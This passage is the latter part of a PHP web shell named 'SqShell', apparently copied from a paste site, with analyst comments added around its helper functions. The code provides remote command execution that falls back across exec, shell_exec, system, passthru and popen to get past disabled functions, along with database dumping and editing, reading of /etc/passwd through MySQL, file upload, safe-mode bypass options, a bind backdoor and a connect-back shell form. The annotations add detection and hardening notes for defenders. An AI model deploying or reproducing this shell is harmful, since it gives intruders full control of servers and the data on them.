379 $con = mysql_connect ($_POST['host'], $_POST['user'], $_POST['password']);
380 @mysql_select_DB($_POST['dbname'],$con);
381 $q = mysql_query ($_POST['query']);
382 $i=0;
383 if ($q == false) die ("FAILED: " . $_POST['query'] . "\n" ."REASON: " . mysql_error () . "\n");
384 while($r = @mysql_fetch_array ($q)) { $i++;
385 Echo "\n---------------------------\n"."Result Number [$i]:-\n---------------------------\n";
386 foreach($r as $key => $val) { if(!is_numeric($key)) { Echo "$key => ".htmlspecialchars($val)."\n";
387 } } } @mysql_free_result ($q);
388 echo "</textarea>";
389 } elseif($_INPUT['do']=="db") { $databases=array();
390 $conn=mysql_connect($_INPUT['host'],$_INPUT['user'],$_INPUT['password']) or die("Error User Name Or Password");
391 if(strlen($_INPUT['dbname'])>1) { mysql_select_db($_INPUT['dbname'],$conn) or die("Wrong Table For that user");
392 $query=mysql_list_tables($_INPUT['dbname']);
393 $tables='';
394 $href=$md5."CODE=mysql&do=db&path=".GETCWD()."&host=".$_INPUT['host']."&user=".$_INPUT['user'].'&password='.$_INPUT['password'].'&dbname='.$_INPUT['dbname'];
395 while($row=mysql_fetch_array($query)) { $tname=$row['Tables_in_'.$_INPUT['dbname']];
396 $action=$link.base64_encode("$href&table=$tname");
397 $tables=$tables."<a href=\"$action\">$tname</a><br>";
398 } $href=$md5."CODE=mysql&do=db&path=".GETCWD()."&host=".$_INPUT['host']."&user=".$_INPUT['user'].'&password='.$_INPUT['password'].'&dbname='.$_INPUT['dbname'];
399 $amain=$link.base64_encode($href);
400 $aquery=$link.base64_encode($href."&act_do=query");
401 $adump=$link.base64_encode($href."&act_do=dump");
402 $aexit=$link.base64_encode($md5);
403 Echo "<table style=\"color:#5E5B5B;
404font-size:12px;
405font-family:Verdana;
406\" width=\"100%\">
407 <tr>
408 <td colspan=\"2\" style=\"border: 1px solid #000000;
409\" align=\"center\"><font size=\"4\"><a href=\"$amain\">Main</a> - <a href=\"$aquery\">Query</a> - <a href=\"$adump\">Dump</a> - <a href=\"$aexit\">Exit</a></font></td>
410 </tr>
411 <tr>
412 <td width=\"25%\" style=\"border: 1px solid #000000;
413\" valign=\"top\">";
414 $href=$md5."CODE=mysql&do=db&path=".GETCWD()."&host=".$_INPUT['host']."&user=".$_INPUT['user'].'&password='.$_INPUT['password'];
415 $back=$link.base64_encode($href);
416 Echo "<a href=\"$back\" style=\"color:red\">-[ Select Another Database ]-</a><br><hr>";
417 Echo $tables;
418 Echo "</td>
419 <td width=\"75%\" style=\"border: 1px solid #000000;
420\" valign=\"top\"><h3>Controling Table ".$_INPUT['table']."</h3>
421<br>";
422 if(strlen($_INPUT['table'])>1) { $fields=array();
423 $query = mysql_query("SHOW FIELDS FROM `".$_INPUT['table']."`");
424 while($row=mysql_fetch_array($query)) { $frows[$row['Field']]=$row;
425 $fields[]=$row['Field'];
426 if($row['Extra']=="auto_increment") { $skey=$row['Field'];
427 } } if($_INPUT['t_act']=="delete") { if(empty($_INPUT['t_act_do'])) { $kkey=$_INPUT['key'];
428 $edit_query=mysql_query("select * FROM `".$_INPUT['table']."` where ".$kkey.'=\''.$_INPUT[$kkey].'\'');
429 $href=$md5."CODE=mysql&do=db&path=".GETCWD()."&host=".$_INPUT['host']."&user=".$_INPUT['user'].'&password='.$_INPUT['password'].'&dbname='.$_INPUT['dbname'].'&table='.$_INPUT['table'].'&';
430 $action=$link.base64_encode("$href&t_act=delete&t_act_do=delete&key=".$_INPUT['key']."&".$_INPUT['key']."=".$_INPUT[$kkey]."");
431 Echo "<form name=edit action='$action' method='post'>
432 <input type=hidden name='t_act_do' value='delete'>";
433 Echo "<table style=\"color:#000000;
434font-size:12px;
435font-family:Verdana;
436\" width=\"100%\">
437 <tr>
438 <td colspan=\"2\" style=\"border: 1px solid #000000;
439\" align=\"center\">Deleting Row</td>
440 </tr> <tr>
441 <td colspan=\"2\" style=\"border: 1px solid #000000;
442\" align=\"center\">Are You Sre You want Delete the row where is $kkey = ".$_INPUT[$kkey]."</td>
443 </tr>";
444 Echo "<tr align='center'><td colspan=2 style=\"border: 1px solid #000000;
445\"><input type='submit' value='- - Delete - -'> -- -- -- <input type='reset' value='- - Back - -' onclick='window.location=javascript:history.back()'></td></tr>";
446 Echo "</table></form>";
447 } else { $kkey=$_INPUT['key'];
448 $href=$md5."CODE=mysql&do=db&path=".GETCWD()."&host=".$_INPUT['host']."&user=".$_INPUT['user'].'&password='.$_INPUT['password'].'&dbname='.$_INPUT['dbname'].'&table='.$_INPUT['table'].'&';
449 $ed_ag=$link.base64_encode("$href&t_act=delete&key=".$_INPUT['key']."&".$_INPUT['key']."=".$_INPUT[$kkey]."");
450 $bk_tb=$link.base64_encode("$href");
451 $comma='';
452 $sets='';
453 $update_q=mysql_query("delete from `".$_INPUT['table']."` where ".$kkey.'=\''.$_INPUT[$kkey].'\'');
454 if(!$update_q) { Echo "<h3>Problem And Was Not Deleted ..</h3><br><Br><a href='$ed_ag'>Delete Again</a> - <a href='$bk_tb'>Back to table</a>";
455 } else { Echo "<h3>Deleted ..</h3><br><Br><a href='$bk_tb'>Back to table</a>";
456 } } } elseif($_INPUT['t_act']=="edit") { if(empty($_INPUT['t_act_do'])) { $kkey=$_INPUT['key'];
457 $edit_query=mysql_query("select * FROM `".$_INPUT['table']."` where ".$kkey.'=\''.$_INPUT[$kkey].'\'');
458 $href=$md5."CODE=mysql&do=db&path=".GETCWD()."&host=".$_INPUT['host']."&user=".$_INPUT['user'].'&password='.$_INPUT['password'].'&dbname='.$_INPUT['dbname'].'&table='.$_INPUT['table'].'&';
459 $action=$link.base64_encode("$href&t_act=edit&t_act_do=edit&key=".$_INPUT['key']."&".$_INPUT['key']."=$_INPUT[$kkey]");
460 Echo "<form name=edit action='$action' method='post'>
461 <input type=hidden name='t_act_do' value='edit'>";
462 Echo "<table style=\"color:#5E5B5B;
463font-size:12px;
464font-family:Verdana;
465\" width=\"100%\">
466 <tr>
467 <td colspan=\"2\" style=\"border: 1px solid #000000;
468\" align=\"center\">Editing Row</td>
469 </tr>";
470 while($row=mysql_fetch_array($edit_query)) { foreach($fields as $key => $val) { Echo "<tr><td style=\"border: 1px solid #000000;
471\">";
472 Echo "$val</td><td style=\"border: 1px solid #000000;
473\">";
474 if(eregi("text",$frows[$val]['Type'])) { Echo "<textarea name='".$val."' rows='5' cols='50'>".htmlspecialchars($row[$val])."</textarea>";
475 } elseif(eregi("enum",$frows[$val]['Type'])) { Echo "<input type='text' name='".$val."' value='".htmlspecialchars($row[$val])."' size='50'>";
476 } else { Echo "<input type='text' name='".$val."' value='".htmlspecialchars($row[$val])."' size='50'>";
477 } Echo "</td></tr>";
478 } } Echo "<tr align='center'><td colspan=2 style=\"border: 1px solid #000000;
479\"><input type='submit' value='- - Edit - -'> -- -- -- <input type='reset' value='- - Reset - -'></td></tr>";
480 Echo "</table></form>";
481 } else { $kkey=$_INPUT['key'];
482 $href=$md5."CODE=mysql&do=db&path=".GETCWD()."&host=".$_INPUT['host']."&user=".$_INPUT['user'].'&password='.$_INPUT['password'].'&dbname='.$_INPUT['dbname'].'&table='.$_INPUT['table'].'&';
483 $ed_ag=$link.base64_encode("$href&t_act=edit&key=".$_INPUT['key']."&".$_INPUT['key']."=$_INPUT[$kkey]");
484 $bk_tb=$link.base64_encode("$href");
485 $comma='';
486 $sets='';
487 foreach($fields as $key => $val) { $sets.=$comma.'`'.$val.'`=\''.$_INPUT[$val].'\'';
488 $comma=',';
489 } $update_q=mysql_query("UPDATE `".$_INPUT['table']."` set $sets where ".$kkey.'=\''.$_INPUT[$kkey].'\'');
490 if(!$update_q) { Echo "<h3>Problem And Was Not Edited ..</h3><br><Br><a href='$ed_ag'>Edit Again</a> - <a href='$bk_tb'>Back to table</a>";
491 } else { Echo "<h3>Edited ..</h3><br><Br><a href='$ed_ag'>Edit Again</a> - <a href='$bk_tb'>Back to table</a>";
492 } } } else { echo "<table style=\"border: 1px solid #000000;
493color:#000000;
494font-size:12px;
495font-family:Verdana;
496\"><tr>";
497 Echo "<td style=\"border: 1px solid #000000;
498\">Delete</td>";
499 Echo "<td style=\"border: 1px solid #000000;
500\">Edit</td>";
501 foreach($fields as $key => $val) { Echo "<td style=\"border: 1px solid #000000;
502\">
503$val</td>";
504 } echo "</tr>";
505 $num_query=mysql_query("select * from `".$_INPUT['table']."`");
506 $sql_page=($_INPUT['sql_page'])?$_INPUT['sql_page']:1;
507 $start=($sql_page * 40)-40;
508 $limit=$start.',40';
509 $query=mysql_query("select * from `".$_INPUT['table']."` limit $limit");
510 $href=$md5."CODE=mysql&do=db&path=".GETCWD()."&host=".$_INPUT['host']."&user=".$_INPUT['user'].'&password='.$_INPUT['password'].'&dbname='.$_INPUT['dbname'].'&table='.$_INPUT['table'].'&';
511 while($row=mysql_fetch_array($query)) { echo "<tr>";
512 $dellink=$link.base64_encode("$href&t_act=delete&key=$skey&$skey=$row[$skey]");
513;
514 $editlink=$link.base64_encode("$href&t_act=edit&key=$skey&$skey=$row[$skey]");
515;
516 Echo "<td style=\"border: 1px solid #000000;
517\"><a href='$dellink'>Delete</a></td>";
518 Echo "<td style=\"border: 1px solid #000000;
519\"><a href='$editlink'>Edit</a></td>";
520 foreach($fields as $key => $val) { Echo "<td style=\"border: 1px solid #000000;
521\">
522".htmlspecialchars($row[$val])."</td>";
523 } echo "</tr>";
524 } Echo "</table>";
525 $pages=mysql_num_rows($num_query);
526 $page_nums=ceil($pages/40);
527 for($i=0;
528$i<$page_nums;
529$i++) { $ii=$i+1;
530 $hlink=$link.base64_encode("$href&sql_page=$ii");
531 Echo "<a href='$hlink'>$ii</a>||";
532 } } } else { Echo "<h1>Controling Database ".$_INPUT['dbname']." </h1><font size=4>Select Table To Control The Table Rows</font><br>";
533 Echo $tables;
534 } Echo "</td></tr></table>";
535 } else { Echo "<h3>Select Database To Control</h3>";
536 $query=mysql_list_dbs($conn);
537 while($row=mysql_fetch_array($query)) { $databases[]=$row['Database'];
538 } $href=$md5."CODE=mysql&do=db&path=".GETCWD()."&host=".$_INPUT['host']."&user=".$_INPUT['user'].'&password='.$_INPUT['password'];
539 foreach($databases as $key => $val) { $ahref=$href.'&dbname='.$val;
540 $action=$link.base64_encode($ahref);
541 echo("<a href=\"$action\">$val</a><br>");
542 } } } else { Echo "<h2>Sql Manager</h2>";
543 $href=$md5."CODE=mysql&do=db&path=".GETCWD();
544 $action=$link.base64_encode($href);
545 Echo "<form name=\"sql-connect\" action=\"$action\" method=\"post\">
546<table border=\"0\" id=\"contentpage\">
547<tr>
548<td>DB User</td>
549<td>DB Pass</td>
550<td>Db Name</td>
551</tr>
552<tr>
553<td><input type=\"text\" name=\"user\" value=\"root\"></td>
554<td><input type=\"text\" name=\"password\" value=\"\"></td>
555<td><input type=\"text\" name=\"dbname\" value=\"test\"></td>
556</tr>
557<tr>
558<td>DB Host</td>
559<td>
560</td>
561</tr>
562<tr>
563<td><input type=\"text\" name=\"host\" value=\"localhost\"></td>
564<td><input type=submit value=\"Connect\"></td>
565</tr>
566</table></form>";
567 Echo "</center>";
568 } } Echo '</td></tr></table> ';
569 Echo "<br><table align=center style=\"background:#F4F4F4;
570color:#6E6E6E;
571width: 95%;
572border: 1px solid #6E6E6E;
573margin: auto auto;
574font-size:12px;
575font-weight:bold;
576\">";
577 $action=$links[1];
578 Echo '<tr><td colspan="2">';
579 Echo '<center><form name="command" action="'.$action.'" method="post">Execute Comamnds To the Server : ';
580 Echo '<input type=text name="cdm" size="50">'."\n<input type=submit value=\" - - - Go - - - \"></form> </center></td></tr><tr>";
581 Echo '<tr><td colspan="2">';
582 Echo '<center><form name="command" action="'.$action.'" method="post">Execute Specific Commands : ';
583 Echo '<select name="cdm">'.$commandsselects.'</select>'."\n<input type=submit value=\" - - - Go - - - \"></form> </center></td></tr><tr></table>";
584 Echo "<br>\n<table align='center' border='1' bordercolor='#111111' style=\"background:#F4F4F4;
585color:#6E6E6E;
586border-collapse: collapse;
587width: 95%;
588margin: auto auto;
589font-size:12px;
590font-weight:bold;
591\">";
592 Echo '<tr style="background-color:black;
593color:#FFFFFF"><td colspan="2"><center>Uplad / Make - Files/Dirs</center></td></tr>';
594 Echo "<tr><td>";
595 $href=$md5."CODE=file&do=create&path=".GETCWD();
596 $action=$link.base64_encode($href);
597 Echo '<center><form name="make" action="'.$action.'" method="post">Make File : <input type="text" name="file" value='.$dir.$directorysperator.'>'."\n<input type=submit value=\" - - - Go - - - \"></form> </center>";
598 Echo '</td>';
599 Echo '<td>';
600 $href=$md5."CODE=dir&do=up&path=".GETCWD();
601 $action=$link.base64_encode($href);
602 Echo '<center><form name="upload" action="'.$action.'" enctype="multipart/form-data" method="post">Upload File : <input type="file" name="file">'."\n<input type=submit value=\" - - - Go - - - \"></form> </center>";
603 Echo '</td>';
604 Echo '</tr>';
605 Echo '<tr><td>';
606 $href=$md5."CODE=dir&do=crdir&path=".GETCWD();
607 $action=$link.base64_encode($href);
608 Echo '<center><form name="create" action="'.$action.'" method="post">Make Dir : <input type="text" name="dirname" value='.$dir.$directorysperator.'>'."\n<input type=submit value=\" - - - Go - - - \"></form> </center>";
609 Echo '</td>';
610 Echo '<td>';
611 $href=$md5."CODE=dir&do=godir&path=".GETCWD();
612 $action=$link.base64_encode($href);
613 Echo '<center><form name="go" action="'.$action.'" method="post">Go To Dir : <input type="text" name="dirname" value='.$dir.$directorysperator.'>'."\n<input type=submit value=\" - - - Go - - - \"></form> </center>";
614 Echo '</td>';
615 Echo '</tr>';
616 Echo '<tr style="background-color:black;
617color:#FFFFFF"><td colspan="2"><center>Safe Mode / Open_Basedir - ByPass</center></td></tr>';
618 $bugs="";
619 $arrays=array('Tempname','CURL','Copy','Ini_Restore','IMAP','ReadFile','File_Get_Contents','Shell_Command','Id Only /etc/passwd');
620 foreach($arrays as $key => $val) { $bugs.="<option value='$val'>$val</option>";
621 } Echo '<tr><td>';
622 $href=$md5."CODE=bypass&do=bypass_file&path=".GETCWD();
623 $action=$link.base64_encode($href);
624 Echo '<center><form name="create" action="'.$action.'" method="post">Read File : <input type="text" name="filename" value='.$dir.$directorysperator.'>';
625 Echo "<select name=\"bug\">$bugs</select>";
626 Echo "\n<input type=submit value=\" - - - Go - - - \"></form> </center>";
627 Echo '</td>';
628 $bugs="";
629 $arrays=array('GLOB','IMAP','OpenDir','Shell_Command');
630 foreach($arrays as $key => $val) { $bugs.="<option value='$val'>$val</option>";
631 } Echo '<td>';
632 $href=$md5."CODE=bypass&do=bypass_dir&path=".GETCWD();
633 $action=$link.base64_encode($href);
634 Echo '<center><form name="go" action="'.$action.'" method="post">List Dir : <input type="text" name="dirname" value='.$dir.$directorysperator.'>';
635 Echo "<select name=\"bug\">$bugs</select>";
636 Echo "\n<input type=submit value=\" - - - Go - - - \"></form> </center>";
637 Echo '</td>';
638 Echo '</tr>';
639 $href=$md5."CODE=mysql&do=readfile&path=".GETCWD();
640 $action=$link.base64_encode($href);
641 Echo '<tr style="background-color:black;
642color:#FFFFFF"><td colspan="2"><center>Mysql Staff</center></td></tr>';
643 Echo '<tr><td colspan=2>';
644 Echo "\n<table align='center' border='0' bordercolor='#111111' style=\"background:#F4F4F4;
645color:#6E6E6E;
646border-collapse: collapse;
647width: 95%;
648margin: auto auto;
649font-size:12px;
650font-weight:bold;
651\"><tr><td>";
652 Echo '<center>';
653 Echo '<form name="mysql" action="'.$action.'" method="post">
654DBHost : <input name="host" type="text" value="localhost">
655<br>DBUser : <input name="user" type="text" value="root">
656<br>DBPass : <input name="password" type="text" value="root">
657<br>DBName : <input name="dbname" type="text" value="test">
658<br>Filename : <input name="file" type="text" value="/etc/passwd">
659<br><input type=submit value="Get File Contents"></form>';
660 Echo "</center>";
661 Echo '</td>';
662 $href=$md5."CODE=mysql&do=query&path=".GETCWD();
663 $action=$link.base64_encode($href);
664 Echo '<td>';
665 Echo '<center>';
666 Echo '<form name="mysql" action="'.$action.'" method="post">
667DBHost : <input name="host" type="text" value="localhost">
668<br>DBUser : <input name="user" type="text" value="root">
669<br>DBPass : <input name="password" type="text" value="root">
670<br>DBName : <input name="dbname" type="text" value="test">
671<br>Query : <input name="query" type="text" value="select * from mysql.user">
672<br><input type=submit value="Execute Query"></form>';
673 Echo "</center>";
674 Echo '</td>';
675 $href=$md5."CODE=mysql&do=db&path=".GETCWD();
676 $action=$link.base64_encode($href);
677 Echo '<td>';
678 Echo '<center>';
679 Echo '<form name="mysql" action="'.$action.'" method="post">
680DBHost : <input name="host" type="text" value="localhost">
681<br>DBUser : <input name="user" type="text" value="root">
682<br>DBPass : <input name="password" type="text" value="root">
683<br>DBName : <input name="dbname" type="text" value="test"><br><input type=submit value="Connect"></form>';
684 Echo "</center>";
685 Echo '</td>';
686 Echo '</tr></table>';
687 Echo '</td>';
688 Echo '</tr>';
689 $action=$links[2];
690 Echo '<tr style="background-color:black;
691color:#FFFFFF"><td colspan="2"><center>BackDoor - BackConnecttion</center></td></tr>';
692 Echo '<tr><td>';
693 Echo '<center>';
694 Echo '<form name="back" action="'.$action.'" method="post"><input type="hidden" name="backdoored" value="1">Port : <input ReadOnly type="text" value="1666"><br><br><input type=submit value="Generate Backdoor"></form>';
695 Echo'</center>';
696 Echo '</td>';
697 $action=$links[3];
698 Echo '<td>';
699 Echo '<center>';
700 Echo "<form name=\"backcon\" action=\"$action\" method=\"post\">\n<input type=\"hidden\" name=\"backdoored\" value=\"1\">
701Ip : \n<input type=\"text\" name=\"i\" value=\"".getip()."\">
702<br> Port : <input type=\"text\" name=\"p\" value=\"22290\"><br><br><input type=submit value=\"Connect-Back\"></form>";
703 Echo "</center>";
704 Echo '</td>';
705 Echo '</tr>';
706 Echo '</table>';
707 Echo "<br>\n<table align=center style=\"background:#F4F4F4;
708color:#6E6E6E;
709width: 95%;
710border: 1px solid #6E6E6E;
711margin: auto auto;
712font-size:12px;
713font-weight:bold;
714\">";
715 Echo '
716 <tr>
717 <td align="center">
718 Copyright ©
719 Is reserved to : <a href="mailto:security@soqor.net">HACKERS PAL</a>
720 <br>
721 SqShell By <a href="http://www.soqor.net">SoQoR.NeT</a> Team
722 </td>
723 </tr>';
724 Echo '</table>';
725 Echo "\n</body>\n</html>";
// ---------------------------------------------------------------------------
// Analyst annotations (code below is unchanged).
// These are the helper functions of the script. Its footer names it "SqShell",
// and together with the command, file-manager, database and connect-back forms
// it prints, it is a PHP web shell. The leading number on every line is the
// paste site's own line counter, not PHP.
// ---------------------------------------------------------------------------
// size($value): format a byte count as a string with a unit suffix
// (' Byte', ' KB', ' MB', ' GB', ' TB'), rounded to two decimals.
// NOTE(review): the thresholds mix 1024 and 1000 (1024, 1024*1000, ...), so the
// MB/GB/TB figures are neither true binary nor true decimal units.
726 function size($value) { if($value >= (1024*1000*1000*1000)) { $size=($value/(1024*1000*1000*1000));
727 $ex = ' TB';
728 }elseif($value >= (1024*1000*1000)) { $size=($value/(1024*1000*1000));
729 $ex = ' GB';
730 }elseif($value >= (1024*1000)) { $size=($value/(1024*1000));
731 $ex=' MB';
732 }elseif($value >= 1024) { $size=($value/1024);
733 $ex=' KB';
734 }else { $size=$value;
735 $ex = ' Byte';
736 } return @round($size,2).$ex;
// command($cmda): hand a command string to the operating system and return its
// output as a string; an empty $cmda returns ''.
// It tries exec, shell_exec, system and passthru in that order, each guarded by
// function_exists(), and finally popen. function_exists() reports false for
// functions listed in php.ini disable_functions, so the chain settles on
// whichever primitive a partial hardening left enabled. For defenders: the
// whole family (these five plus proc_open) has to be disabled together, and a
// web-server worker spawning child processes is the runtime signal to alert on.
// Every call carries '@', which suppresses the PHP warning a failure would raise.
737 } function command($cmda) { $return = '';
738 if (!empty($cmda)) { if(function_exists('exec')) { @exec($cmda,$return);
739 $return = join("\n",$return);
740 } elseif(function_exists('shell_exec')) { $return = @shell_exec($cmda);
741 } elseif(function_exists('system')) { @ob_start();
742 @system($cmda);
743 $return = @ob_get_contents();
744 @ob_end_clean();
745 } elseif(function_exists('passthru')) { @ob_start();
746 @passthru($cmda);
747 $return = @ob_get_contents();
748 @ob_end_clean();
// Last fallback: popen() is attempted without a function_exists() guard and its
// output is read in 1024-byte chunks.
749 } elseif(@is_resource($f = @popen($cmda,'r'))) { $return = '';
750 while(!@feof($f)) { $return .= @fread($f,1024);
751 } @pclose($f);
752 } } return $return;
// random($num): build a string of $num picks from the letters a-z and A-Z.
// NOTE(review): $letters has 52 entries (indexes 0-51) but rand(1,52) is used,
// so 'a' is never chosen and index 52 is out of range and contributes nothing;
// the result can be shorter than $num. $ret is never initialised before '.='.
// rand() is not a cryptographically secure source.
753 } function random($num) { $letters=array('a', 'b', 'c', 'd','e','f','g','h','i','j','k','l','m','n','o','p','q','r', 's','t','u','v','w','x','y','z','A','B','C','D','E','F','G','H','I','J','K', 'L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z');
754 $i=0;
755 while($i<$num) { $ret.=$letters[rand(1,52)];
756 $i++;
757 } return $ret;
// printfile($fileinfo): render one HTML table row for a directory entry.
// Reads the keys name, size, read, modify, owner and permissions; an entry
// whose size is the string 'dir' is linked with CODE=dir and shown in brackets,
// anything else is linked with CODE=file and gets download/edit/delete links.
// Every link is $link followed by base64_encode() of a query string of the form
// "CODE=...&path=...&do=..."; $link and $md5 are globals set outside this block.
// For log review: requests to this script therefore carry one base64 blob as the
// whole query string, which decodes to CODE= / path= / do= pairs.
// NOTE(review): the fields are concatenated into the markup without
// htmlspecialchars(), so names are emitted unescaped.
758 } function printfile($fileinfo) { GLOBAL $link,$directorysperator,$md5;
759 $perhref=$md5.'CODE=perms&'.'path='.GETCWD().$directorysperator.$fileinfo['name'];
760 if($fileinfo['size'] == 'dir') { $href=$md5.'CODE=dir&'.'path='.GETCWD().$directorysperator.$fileinfo['name'];
761 $fileinfo['name']='['.$fileinfo['name'].']';
762 } else { $href=$md5.'CODE=file&'.'path='.GETCWD().$directorysperator.$fileinfo['name'];
763 $fileinfo['actions']='<a href="___1___">[DOWN]</a>-<a href="___2___">[Edit]</a>-<a href="___3___">[Del]</a>';
// Fill the ___1___/___2___/___3___ placeholders with the encoded links. The
// directory branch above does not set 'actions', so it is labelled "Directory"
// further down unless the caller supplied a value (caller not visible here).
763 } $herf1=$link.base64_encode("$href&do=down");
764 $href2=$link.base64_encode("$href&do=edit");
765 $href3=$link.base64_encode("$href&do=del");
766 $fileinfo['actions']=str_replace('___1___',$herf1,$fileinfo['actions']);
767 $fileinfo['actions']=str_replace('___2___',$href2,$fileinfo['actions']);
768 $fileinfo['actions']=str_replace('___3___',$href3,$fileinfo['actions']);
769 $href=$link.base64_encode($href);
770 $perhref=$link.base64_encode($perhref);
// Colour the read/modify/permissions cells: green when modify is 'Yes', black
// when only read is 'Yes', red otherwise.
771 if($fileinfo['modify'] == 'Yes') { $pcolor='green';
772 }elseif($fileinfo['read'] == 'Yes') { $pcolor='#000000';
773 } else { $pcolor='red';
774 } $fileinfo['read'] = '<font color="'.$pcolor.'">'.$fileinfo['read'].'</font>';
775 $fileinfo['modify'] = '<font color="'.$pcolor.'">'.$fileinfo['modify'].'</font>';
776 $fileinfo['permissions'] = '<font color="'.$pcolor.'">'.$fileinfo['permissions'].'</font>';
777 if(!$fileinfo['actions']) { $fileinfo['actions']="Directory";
778 } return '<tr><td width="30%"><a href="'.$href.'">'.$fileinfo['name'].'</a></td>
779 <td>'.$fileinfo['size'].'</td>
780 <td>'.$fileinfo['read'].'</td>
781 <td>'.$fileinfo['modify'].'</td>
782 <td>'.$fileinfo['owner'].'</td>
783 <td><a href="'.$perhref.'">'.$fileinfo['permissions'].'</a></td>
784 <td>'.$fileinfo['actions'].'</td></tr>';
// getperms($file): read the mode of a path with fileperms() (warnings
// suppressed) and return showperms() of it. If fileperms() fails and returns
// false, no bit test matches and the result is 'u---------'.
785 } function getperms($file) { $perms = @fileperms($file);
786 $info = showperms($perms);
787 return $info;
// showperms($perms): turn a numeric file mode into a ten-character ls-style
// string. The first character comes from the file-type bits (0xC000 's',
// 0xA000 'l', 0x8000 '-', 0x6000 'b', 0x4000 'd', 0x2000 'c', 0x1000 'p',
// otherwise 'u'); the next nine are the owner/group/other rwx triplets, where
// 0x0800, 0x0400 and 0x0200 replace the execute slot with s/S, s/S and t/T.
788 } function showperms($perms) { if (($perms & 0xC000) == 0xC000) { $info = 's';
789 } elseif (($perms & 0xA000) == 0xA000) { $info = 'l';
790 } elseif (($perms & 0x8000) == 0x8000) { $info = '-';
791 } elseif (($perms & 0x6000) == 0x6000) { $info = 'b';
792 } elseif (($perms & 0x4000) == 0x4000) { $info = 'd';
793 } elseif (($perms & 0x2000) == 0x2000) { $info = 'c';
794 } elseif (($perms & 0x1000) == 0x1000) { $info = 'p';
795 } else { $info = 'u';
796 } $info .= (($perms & 0x0100) ? 'r' : '-');
797 $info .= (($perms & 0x0080) ? 'w' : '-');
798 $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));
799 $info .= (($perms & 0x0020) ? 'r' : '-');
800 $info .= (($perms & 0x0010) ? 'w' : '-');
801 $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));
802 $info .= (($perms & 0x0004) ? 'r' : '-');
803 $info .= (($perms & 0x0002) ? 'w' : '-');
804 $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));
805 return $info;
// shownumperms($perms): build the three rwx triplets the same way showperms()
// does and map each to a digit with showpermsnum(), giving a string such as
// "755".
// NOTE(review): a triplet containing s/S/t/T has no entry in showpermsnum()'s
// table, so that digit is silently missing from the result.
806 } function shownumperms($perms) { $info='';
807 $permissions='';
808 $info .= (($perms & 0x0100) ? 'r' : '-');
809 $info .= (($perms & 0x0080) ? 'w' : '-');
810 $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));
811 $permissions.=showpermsnum($info);
812 $info='';
813 $info .= (($perms & 0x0020) ? 'r' : '-');
814 $info .= (($perms & 0x0010) ? 'w' : '-');
815 $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));
816 $permissions.=showpermsnum($info);
817 $info='';
818 $info .= (($perms & 0x0004) ? 'r' : '-');
819 $info .= (($perms & 0x0002) ? 'w' : '-');
820 $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));
821 $permissions.=showpermsnum($info);
822 return $permissions;
// showpermsnum($perms): return the index (0-7) of a three-character rwx string
// in the table '---' .. 'rwx'. The comparison is loose (==) and there is no
// return for an unmatched string, so the caller receives null in that case.
823 } function showpermsnum($perms) { $arrayper=array('---','--x','-w-','-wx','r--','r-x','rw-','rwx');
824 foreach($arrayper as $key => $val) { if($val == $perms) { return $key;
// owner($file): return "owner/group" for a path. fileowner()/filegroup() give
// the numeric ids and posix_getpwuid()/posix_getgrgid() resolve them to names;
// each is called only if function_exists() reports it, and the numeric id is
// used when no name is available.
// NOTE(review): if fileowner()/filegroup() are unavailable the id variables are
// never assigned before they are read.
825 } } } function owner($file) { if(function_exists('fileowner')) { $fileowneruid=@fileowner($file);
826 } if(function_exists('posix_getpwuid')) { $fileownerarray=@posix_getpwuid($fileowneruid);
827 } $fileowner=($fileownerarray['name'])?$fileownerarray['name']:$fileowneruid;
828 if(function_exists('filegroup')) { $fileg=@filegroup($file);
829 } if(function_exists('posix_getgrgid')) { $groupinfo = @posix_getgrgid($fileg);
830 } $filegg=($groupinfo['name'])?$groupinfo['name']:$fileg;
831 return "$fileowner/$filegg";
// getip(): pick an address for the requesting client. Order: HTTP_CLIENT_IP if
// set; otherwise the first dotted-quad in X-Forwarded-For that does not start
// with 10., 172.16. or 192.168.; otherwise REMOTE_ADDR. The script uses the
// result as the default of the "i" field in the connect-back form it prints.
// Both headers are supplied by the requester, so the value is not a reliable
// source address for attribution; rely on the web server's own access log.
// NOTE(review): the private-range filter covers 172.16.x.x only, not the whole
// 172.16.0.0/12 block. When X-Forwarded-For is present but yields no match,
// REMOTE_ADDR is not consulted and $ip stays unset. each() was removed in
// PHP 8.0, and 'global $_SERVER' is redundant for a superglobal.
832 } function getip() { global $_SERVER;
833 if (isset($_SERVER['HTTP_CLIENT_IP'])) { $ip = $_SERVER['HTTP_CLIENT_IP'];
834 } else if($_SERVER['HTTP_X_FORWARDED_FOR']) { if(preg_match_all("#[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}#s", $_SERVER['HTTP_X_FORWARDED_FOR'], $ips)) { while(list($key, $val) = each($ips[0])) { if(!preg_match("#^(10|172\.16|192\.168)\.#", $val)) { $ip = $val;
835 break;
836 } } } } else if (isset($_SERVER['REMOTE_ADDR'])) { $ip = $_SERVER['REMOTE_ADDR'];
837 } return $ip;
838 }
840?>